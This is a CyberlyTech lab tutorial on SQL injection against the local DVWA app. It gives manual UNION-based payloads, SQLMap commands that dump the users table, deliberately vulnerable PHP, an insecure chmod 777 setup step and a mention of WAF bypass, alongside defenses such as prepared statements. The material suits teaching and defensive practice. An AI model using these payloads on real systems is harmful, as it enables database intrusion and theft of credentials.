SQL Injection Attack & Defense Lab: A Complete Hands-On Guide

CyberlyTech | Cybersecurity Labs

๐Ÿ” CYBERSECURITY LAB #1

Difficulty: Intermediate | Estimated Time: 3–4 Hours
Tools Used: SQLMap, Burp Suite, DVWA, Kali Linux, MySQL
Category: Web Application Security | Penetration Testing

Introduction

SQL Injection (SQLi) remains one of the most dangerous and widely exploited web application vulnerabilities in cybersecurity history. Listed in the OWASP Top 10 for over a decade, SQL Injection attacks allow malicious actors to manipulate database queries, bypass authentication mechanisms, extract sensitive data and, in severe cases, gain full control of backend servers.

In this premium CyberlyTech hands-on lab, you will learn SQL Injection from the ground up: understanding how it works, practicing real attack techniques in a safe legal environment, and implementing robust defensive countermeasures. This lab is designed for aspiring ethical hackers, penetration testers, and security professionals preparing for certifications like CEH, OSCP, and CompTIA Security+.

Learn more about: https://cyberlytech.tech/how-to-learn-cybersecurity-2026/

Lab Objectives

  • Understand the fundamentals of SQL Injection vulnerability
  • Set up a legal, controlled vulnerable web environment (DVWA)
  • Perform manual SQL Injection attacks step by step
  • Use automated tools like SQLMap for advanced exploitation
  • Analyze HTTP requests with Burp Suite
  • Implement prevention techniques: prepared statements, WAF, input validation

โš™๏ธ Lab Environment Setup

Requirements

  • Kali Linux (VM or bare metal), download from kali.org
  • DVWA (Damn Vulnerable Web Application)
  • XAMPP or Docker for hosting DVWA
  • Burp Suite Community Edition
  • SQLMap (pre-installed on Kali)

Step 1: Install DVWA on Kali Linux

Open your terminal and run the following commands:

sudo apt update && sudo apt upgrade -y

sudo apt install apache2 php php-mysqli mariadb-server -y

cd /var/www/html

sudo git clone https://github.com/digininja/DVWA.git

sudo chmod -R 777 DVWA/

sudo service apache2 start

sudo service mysql start

Step 2: Configure DVWA Database

Open a browser and navigate to http://localhost/DVWA/setup.php, then click ‘Create / Reset Database’. Default credentials: admin / password. Set the security level to Low for this lab.

Lab Module 1: Understanding SQL Injection

How SQL Injection Works

When a web application builds a SQL query by concatenating user-supplied input into the query string without proper sanitization, an attacker can inject SQL of their own. Consider this vulnerable PHP code:

$query = "SELECT * FROM users WHERE id='" . $_GET['id'] . "'";

If a user supplies the value 1' OR '1'='1 the query becomes:

SELECT * FROM users WHERE id='1' OR '1'='1'

The WHERE clause is now always true, so the query returns every row: this is how a login check is bypassed and how all user records get dumped.

๐Ÿ› ๏ธ Lab Module 2: Manual SQL Injection Attack

Task 1: Basic Error-Based Injection

Navigate to DVWA > SQL Injection. Enter the following payloads one by one and observe the responses:

  1. Test for vulnerability: Enter ' (a single quote) and observe the SQL error
  2. Determine column count: Enter 1' ORDER BY 1-- (increment the number until an error appears)
  3. Find output columns: Enter 1' UNION SELECT NULL,NULL--
  4. Extract database version: Enter 1' UNION SELECT @@version,NULL--
  5. Extract table names: Enter 1' UNION SELECT table_name,NULL FROM information_schema.tables--

Expected Output

First name: 5.7.33-0ubuntu0.18.04.1

Surname: NULL

This confirms successful data extraction from the backend MySQL database.

Lab Module 3: Automated SQLMap Attack

Intercepting the Request with Burp Suite

  1. Configure the browser proxy to 127.0.0.1:8080.
  2. Enable Burp Suite intercept.
  3. Submit a form on the DVWA SQL Injection page.
  4. Save the intercepted request to a file: request.txt

Running SQLMap

sqlmap -r request.txt --dbs --batch

sqlmap -r request.txt -D dvwa --tables --batch

sqlmap -r request.txt -D dvwa -T users --dump --batch

SQLMap will automatically detect the injection point, test multiple techniques (UNION, Boolean-based, Time-based), and extract the complete users table including hashed passwords.

๐Ÿ” Lab Module 4: Defense & Prevention

1. Use Prepared Statements (Parameterized Queries)

$stmt = $pdo->prepare('SELECT * FROM users WHERE id = ?');

$stmt->execute([$user_id]);

2. Input Validation & Whitelisting

$id = filter_var($_GET['id'], FILTER_VALIDATE_INT);

if ($id === false) { die('Invalid input'); }
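The mechanism from Lab Module 1 and the two code-level defenses above, worked end to end as an added example (not code from the original lab): Python with sqlite3 stands in for PHP/MySQL, the users rows are constructed, and validate_id only approximates PHP's FILTER_VALIDATE_INT. The same payload that makes the concatenated query return every row returns nothing once the value is bound as a parameter, and never reaches the database once it fails validation.

```python
import re
import sqlite3

# Constructed sample rows standing in for DVWA's users table
# (the lab uses MySQL; sqlite3 is used here so the example runs offline).
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "gordonb", "Brown"),
    (3, "pablo", "Picasso"),
]

INT_RE = re.compile(r"^[+-]?\d+$")  # approximates PHP's FILTER_VALIDATE_INT

def make_db():
    """Create an in-memory database holding the constructed users rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, first_name TEXT, surname TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn

def lookup_vulnerable(conn, user_id):
    """Same pattern as the lab's PHP: the raw request value is glued into the SQL."""
    query = "SELECT * FROM users WHERE id='" + user_id + "'"
    return conn.execute(query).fetchall()

def lookup_prepared(conn, user_id):
    """Defense 1: parameterized query; the value is bound as data, never parsed as SQL."""
    return conn.execute("SELECT * FROM users WHERE id=?", (user_id,)).fetchall()

def validate_id(raw):
    """Defense 2: allow-list validation; returns an int, or None for anything else."""
    return int(raw) if INT_RE.match(raw) else None

def compare(conn, user_input):
    """Row counts each lookup returns for one input (None when validation rejects it)."""
    valid = validate_id(user_input)
    return {
        "vulnerable": len(lookup_vulnerable(conn, user_input)),
        "prepared": len(lookup_prepared(conn, user_input)),
        "validated": None if valid is None else len(lookup_prepared(conn, str(valid))),
    }

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1' OR '1'='1"):
        print(repr(value), compare(db, value))
```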

3. Web Application Firewall (WAF)

Deploy a WAF like ModSecurity (Apache) or Cloudflare WAF to automatically block SQL injection patterns before they reach your application layer.

4. Least Privilege Database Accounts

Your web application's database user should hold only the privileges it actually needs, typically SELECT, INSERT and UPDATE, and never DROP, ALTER or EXECUTE, so that a successful injection cannot destroy the schema or run code on the server.

SQL Injection Types: Quick Reference

Type               Description                                Detection Method
Classic / In-band  Results shown directly in the response     UNION SELECT attacks
Blind Boolean      No visible output, but responses differ    True/False conditions
Time-based Blind   Causes the DB to delay its response        SLEEP() / WAITFOR DELAY

Conclusion

SQL Injection is a critical vulnerability that every security professional must understand deeply. In this lab, you progressed from understanding the fundamental mechanics of SQLi to performing real attacks using both manual techniques and automated tools like SQLMap. You also learned how to defend applications using parameterized queries, input validation, and WAFs.

Mastering SQL Injection is a cornerstone skill for CEH, OSCP, and Bug Bounty hunting. Practice these techniques in legal environments like HackTheBox, TryHackMe, and DVWA only. Always obtain written permission before testing any real systems.

Continue your journey with the next CyberlyTech labs covering XSS, CSRF, and Advanced Web Application Penetration Testing.

โ“ Frequently Asked Questions (FAQ)

Q1: Is SQL Injection still relevant in 2025?

Yes. Despite being one of the oldest web vulnerabilities, SQL Injection consistently appears in real-world breaches and penetration testing engagements. Thousands of applications remain vulnerable due to legacy codebases and improper development practices.

Q2: Can SQLMap bypass WAF protections?

SQLMap includes tamper scripts that can bypass some WAF implementations. However, enterprise-grade WAFs with behavioral analysis and machine learning are significantly harder to bypass. This is why defense-in-depth is critical.

Q3: What is the legal status of SQL injection testing?

SQL Injection testing is legal only with explicit written authorization from the system owner. Unauthorized testing constitutes a criminal offense under laws like the Computer Fraud and Abuse Act (CFAA) in the US and equivalent laws globally.

Q4: How do I practice SQL Injection safely?

Use dedicated vulnerable platforms: DVWA (local), HackTheBox, TryHackMe, PortSwigger Web Security Academy (free), and VulnHub machines. Never test on production systems without authorization.

Q5: Does using an ORM prevent SQL Injection?

ORMs (like SQLAlchemy, Hibernate) significantly reduce SQLi risk when used correctly. However, raw query methods and improper ORM usage can still introduce vulnerabilities. Security code reviews remain essential.

โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”

© 2026 CyberlyTech | cyberlytech.tech | Premium Cybersecurity Education
